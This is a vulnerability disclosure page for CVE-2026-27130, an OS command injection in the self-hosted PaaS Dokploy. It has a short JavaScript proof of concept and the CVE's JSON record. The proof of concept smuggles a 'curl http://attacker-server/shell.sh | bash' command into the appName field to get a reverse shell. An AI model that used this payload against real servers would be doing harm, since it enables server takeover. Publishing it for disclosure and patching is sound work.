CVE-2026-27130

// PoC for CVE-2026-27130 // Attacker injects a payload into the appName parameter during application creation. // The payload attempts to execute a reverse shell. const maliciousAppName = "testapp; $(curl http://attacker-server/shell.sh | bash) #"; // Hypothetical HTTP Request to create the application fetch('https://target-dokploy.com/api/application', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <ATTACKER_TOKEN>' }, body: JSON.stringify({ appName: maliciousAppName, // Vulnerable parameter // ... other necessary fields }) }); // Triggering the execution // When the admin or system triggers a service operation (e.g., start/stop), // the command executed by the server might look like: // docker-compose up -d "testapp; $(curl http://attacker-server/shell.sh | bash) #" // This results in the execution of the injected curl command.

{"cve": {"id": "CVE-2026-27130", "sourceIdentifier": "[email protected]", "published": "2026-05-18T21:16:39.890", "lastModified": "2026-05-19T17:16:21.520", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dokploy is a free, self-hostable Platform as a Service (PaaS). Versions 0.26.6 and below have OS command injection through the appName parameter. 3 chained issues cause this problem: inadequate input sanitization, lack of schema validation and direct shell interpolation. User-controlled application names are passed through inadequate sanitization (cleanAppName function only replaces spaces and converts to lowercase) before being interpolated directly into shell commands executed via execAsync() and execAsyncRemote(). An authenticated attacker can inject shell metacharacters (e.g., ;, $(), backticks, |, &) in the appName field during application creation, which are then executed with server-level privileges when service operations (start, stop, remove, scale) are triggered. This issue has been resolved in version 0.26.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/Dokploy/dokploy/commit/960892fd8dcf12b7a73a00edaa1b7090fca860c7", "source": "[email protected]"}, {"url": "https://github.com/Dokploy/dokploy/security/advisories/GHSA-fcgq-jjfg-hrhj", "source": "[email protected]"}, {"url": "https://github.com/Dokploy/dokploy/security/advisories/GHSA-fcgq-jjfg-hrhj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}